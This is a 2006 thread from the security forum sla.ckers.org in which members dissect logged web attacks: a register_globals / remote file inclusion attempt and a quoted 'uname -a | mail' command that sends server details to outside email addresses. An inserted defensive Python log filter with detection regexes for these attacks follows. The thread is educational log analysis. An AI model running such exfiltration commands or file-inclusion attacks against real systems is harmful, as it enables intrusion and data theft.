Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Some fun
Posted by: id
Date: September 12, 2006 01:46PM

I'm not sure if anyone is interested, but we get lots of bots, assholes, hax0rs attacking this site every day, and I figured I'd go ahead and post some of the logs from the ones attacking via http.

For some of you what is going on will be obvious, but for others you may learn a thing or two. See if you can figure out what is going on... (not really a contest, but just have fun with it)

Here is the first one, enjoy.

-id

Re: Some fun
Date: September 12, 2006 05:12PM

Register globals to rewrite system globals, for poorly configured versions of PHP and poorly written scripts. People are still (attempting to) exploit this thing? :-/ Not sure what to make of the email addresses...

Re: Some fun
Posted by: id
Date: September 12, 2006 06:11PM

uname -a | mail -s uname_i2_69.12.144.66 kkparole@yahoo.com

he is piping the output of uname with the subject of uname_i2_69.12.144.66 and sending it to kkparole@yahoo.com;

same with
uname -a | mail -s uname_i2_69.12.144.66 michaelroul@yahoo.com;

-id



Edited 1 time(s). Last edit at 09/12/2006 06:16PM by id.

Re: Some fun
Posted by: id
Date: September 12, 2006 06:14PM

the file he tries to overwrite index.php with is here: http://sla.ckers.org/files/cm.txt

use the xss cheat sheet to decode it if you don't feel like doing it by hand... http://ha.ckers.org/xss.html

-id



Edited 1 time(s). Last edit at 09/12/2006 06:18PM by id.

Re: Some fun
Date: September 12, 2006 06:29PM

id Wrote:
-------------------------------------------------------
> the file he tries to overwrite index.php with is
> here: http://sla.ckers.org/files/cm.txt
>
> use the xss cheat sheet to decode it if you don't
> feel like doing it by hand...
> http://ha.ckers.org/xss.html
>
> -id


I get hit with that one a lot. My original PHP content script just loaded up files I told it to so I got owned. I ended up rewriting it to make sure the file exists, but other than that I have very limited knowledge of PHP.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

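As an added, defender-side illustration of the two things discussed above (the uname | mail command piped out of a web request, and a PHP script that includes whatever file URL it is handed), here is a small access-log filter. It is example code, not from this thread or from sla.ckers.org, and it runs over constructed Apache combined-log lines; the IP addresses, the include URL, the mailbox and the rule names are all assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined-log format (not the thread's real logs).
# Line 1: remote file inclusion attempt via a "page" parameter.
# Line 2: shell command piped into mail, URL-encoded in a "cmd" parameter.
# Line 3: an ordinary request, which should not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Sep/2006:13:40:01 -0700] "GET /index.php?page=http://192.0.2.10/cm.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [12/Sep/2006:13:40:02 -0700] "GET /index.php?cmd=uname%20-a%20|%20mail%20-s%20uname_i2_203.0.113.5%20dropbox@example.invalid HTTP/1.1" 200 0 "-" "Mozilla/4.0"
198.51.100.7 - - [12/Sep/2006:13:41:17 -0700] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status code from a combined-log entry.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)

# Detection rules applied to the URL-decoded request path (names are assumptions).
RULES = [
    # any query parameter whose value starts with a remote URL
    ("remote_file_inclusion", re.compile(r'[?&][^=&]+=(?:https?|ftp)://', re.I)),
    # a recon/download command followed by a shell pipe, separator or backtick
    ("command_injection", re.compile(r'\b(?:uname|wget|curl)\b.*(?:\||;|`)', re.I)),
    # output being handed to the mail client with a subject line
    ("mail_exfil", re.compile(r'\bmail\s+-s\b', re.I)),
]

def analyze_line(line):
    """Parse one log line; return ip, decoded path and matching rule names, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("path"))  # undo %20 etc. before matching
    hits = [name for name, rx in RULES if rx.search(decoded)]
    return {"ip": m.group("ip"), "path": decoded, "hits": hits}

def find_suspicious(log_text):
    """Return the parsed records that triggered at least one rule, in log order."""
    records = (analyze_line(line) for line in log_text.splitlines())
    return [rec for rec in records if rec and rec["hits"]]

if __name__ == "__main__":
    for rec in find_suspicious(SAMPLE_LOG):
        print(rec["ip"], rec["hits"], rec["path"])
```

The rules are deliberately narrow and will miss obfuscated variants; they are a starting point for triage, not a WAF.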
Re: Some fun
Posted by: merliin
Date: September 19, 2006 03:03PM

<brainfart>where's my delete post button again</brainfart>



Edited 1 time(s). Last edit at 09/19/2006 03:25PM by merliin.

Re: Some fun
Posted by: id
Date: September 19, 2006 05:32PM

no brainfarting on our forums!

is anyone interested in more logs with crap in them, or is this just old hat to everyone??

-id

Re: Some fun
Posted by: raif
Date: September 19, 2006 07:18PM

I'm definitely interested in more logs since I'm fairly new to web app security. Keep 'em coming ;)



Edited 1 time(s). Last edit at 09/19/2006 07:21PM by raif.

Re: Some fun
Posted by: id
Date: September 20, 2006 02:23PM

good to hear, I'll try and post a couple a week.

-id

Re: Some fun
Posted by: Kyran
Date: September 20, 2006 06:54PM

Sounds good id.

- Kyran
